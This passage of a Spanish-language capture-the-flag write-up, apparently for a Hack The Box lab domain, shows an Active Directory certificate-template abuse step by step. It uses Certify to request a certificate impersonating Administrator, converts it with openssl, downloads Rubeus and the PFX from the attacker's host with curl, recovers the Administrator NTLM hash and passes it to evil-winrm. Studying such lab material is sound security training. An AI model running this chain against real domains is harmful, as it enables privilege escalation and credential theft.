Certify
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser [29/29]
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name :sequel-DC-CA
DNS Hostname :dc.sequel.htb
FullName :dc.sequel.htb\sequel-DC-CA
Flags :SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName :CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint :A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial :1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date :11/18/2022 12:58:46 PM
Cert End Date :11/18/2121 1:08:46 PM
Cert Chain :CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN :Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
COPY
La herramienta encuentra un template vulnerable. Siguiendo esta guía podemos obtener la clave privada pasandole los datos del template vulnerable.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 10
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxGOO1DKAvaj1yvRuzy9ZN6jOUMKJBE0tevULRjtJyv2Hgog2
PoKOC0+9EaX2AijcAzaIaphCRgMUYEtZyCCazYFL91o3VwHx0ZlfS+UdPhzja6TQ
iBECoZw2YTe2HpTggpiU1ZYKpbb7dhFGG4Bs+JL2Wqc39qRXnmdbFuetlw5XvZ9e
fFkRD7SItqqm1JgJzq+tkwJwjhpQ4V9DkskpMZp7ATeIv+YJGGMbrPwXARhykAzH
8Hg9VKDQMEaZKqoq2PYr9XEH/hjY0ohrvy7CmbdHRjTmSukMh445VxrcqdsWrmTF
39aj38R7gy6fKRdIVR9o4OvUXD4eIR4izFS3MQIDAQABAoIBAEfIqEVx7FLm9mjn
7bT3dqH8puUoJlMXLr+Z4DQcqb1z7FtPFJzGtcr2q4JO6lwhuUHHZheobdkPeRw1
jqyzFkJ1t2HDbST1hgF6ETY5mfXBM3N+O+bwaMjPw6THa19ERcgWo5hqjpvCBapD
aB/XUn2NolTCeJdDvO8eklIN/wqORCzHcq+T0bdaHONbf6itYRySUlKx+To2EDAt
sT532Iy+YBq21MjCr3g5MkwgkfjDUzXlseVAkF5k+l+A3jO/Kp5iBmY//qhd2m9C
NrbrGOo5shii2TvtpAV5ncSicLCIXeLVdsKcTFeNDqPpPDmWoMbw7DlcmEJmeDeX
o1vu6Z0CgYEAz/+5qahzKbqgIANAzqYBFS4pqSfxmo0Kb+nrYbfR1qZtWP382yCI
T5rYSBt5FAwoKAq/0sxTDJbcqbdnPinj9/a7NojRPhdzkhCu7L5p+hohdGMRf7RX
5753bWf5RwzJosUr2nb2mEHKANSGRupL5ooQFbMGOH4onoO+yjLk00MCgYEA8bXt
1X8oZKdLW4IngFBkLLNhgzn6gyMxN47y225QPFHXylv7pIhSEBtrqI/ILMJ2UDbf
NRSPJHZzO6ijtJgCLeiU/xqA2gX5O7d3Q6MPGa6L+lbKVtEkYrlylQXsd9G+CeAa
U+9+th1I7aO0fnk4YepVFgFruGlo0O3gftSNknsCgYAXh8CDNvFASUKQHI4aUqFQ
uhYwcrpcV5RUsMvWFCuC8vTv2lvelkGVb9kD30fFQtLQJNcqi77hb7eq43qkh6yo
gpsPQk8ZjSGf5o9DbQ8kIgyi1ApIvigrqVptYBPNO98bsN6TKl4fP2IQ0foWz66i
d//11HjhrzP9Kr5MtZE5bQKBgQDS9INkqBwq7M+aSBgNpxwm31Al5b48IcTcxogy
9y5T1uJNHMadrNRidmwZq5N7bSUxkRJyE0Vy/2ZHFUH7ZgfQ5YLUut7mafxCIDeY
8oFFWs+UZ5ck+leVSmE0qvzc/lOr7slLpGSksR5rOUtYbpfE7W3hTNAlHOp8HoCm
cQA2bQKBgQCkm0mPA44neIp0t5MyeXRYlHtwbpEYg6IbGVrKkgotYh9romOm8Y0Y
maAgRAI8hh9eBIcLHhS58oRoiCj5dFbN8/zYGCBVk1E5VrFundKSbIXIy3AJxjoM
sjrAz27Zfu/A5xpnO5biglyEKieVNh7Yv75S/rx6iO4hUI/11WeI8Q==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAoGsM42K/arbwAAAAAACjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMjI4MTk1MDQxWhcNMjUwMjI4
MjAwMDQxWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDEY47UMoC9qPXK9G7PL1k3qM5Q
wokETS169QtGO0nK/YeCiDY+go4LT70RpfYCKNwDNohqmEJGAxRgS1nIIJrNgUv3
WjdXAfHRmV9L5R0+HONrpNCIEQKhnDZhN7YelOCCmJTVlgqltvt2EUYbgGz4kvZa
pzf2pFeeZ1sW562XDle9n158WREPtIi2qqbUmAnOr62TAnCOGlDhX0OSySkxmnsB
N4i/5gkYYxus/BcBGHKQDMfweD1UoNAwRpkqqirY9iv1cQf+GNjSiGu/LsKZt0dG
NOZK6QyHjjlXGtyp2xauZMXf1qPfxHuDLp8pF0hVH2jg69RcPh4hHiLMVLcxAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFHtKZ5I1eRlqJsfeeGSlhmJXYwYM
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAhOmt5nhdTg9CXvnWBpMB1AUkd+Gz5NFbIiI9G1RhRAb1ifmvj7FCQBI1
wuP7NvwINNQ1Hr4IvHa4/5Z8nl1Ft0eRztkASbklgfcoQ0ues5k3TJenBX69cwEe
/tcbYp+d4geZXdkwkTZd5e2lEsyV518ovDnOddDkn/MUBWr9ZcLFvPCoAv1SSmIE
IVnfPz8Met8DcMdwwhkW+icQet3Uzi6TsXXKSfnHqiFcyHeMCahut5VWfj+8mZ3u
MPLzR1MXYQDBHJ2UwsODhczyjaYYjqkj+afT7A1zJxDP4BHIStPh0CV0tjNFtGw8
oTmhdsf0oKdJhm1u6q6OZkz0fjWfLg==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.8944694COPY
Guardamos las claves en dos archivos diferentes, cert.pem y private.key y mediante openssl generamos el PFX.
❯ openssl pkcs12 -in cert.pem -inkey private.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
❯ ls
cert.pem cert.pfx private.keyCOPY
Subimos el PFX y la herramienta Rubeus que nos ayudará a generar el hash NTLM del administrador.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.14.34/cert.pfx -o cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> curl 10.10.14.34/Rubeus.exe -o Rubeus.exeCOPY
Generamos el TGT mediante Rubeus y el archivo PFX para obtener el hash NTLM del usuario administrador.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::41d3:4b1:9ebd:35e0%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 2/28/2023 2:36:46 PM
EndTime : 3/1/2023 12:36:46 AM
RenewTill : 3/7/2023 2:36:46 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : KpyfHsOzVkFNw3PGpIYBBg==
ASREP (key) : DE39E6FE183C7BE277EA8DECA4B1848C
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
evil-winrm -i 10.10.11.202 -u "administrator@sequel.htb" -H "A52F78E4C751E5F5E17E1E9F3E58F4EE"
Last updated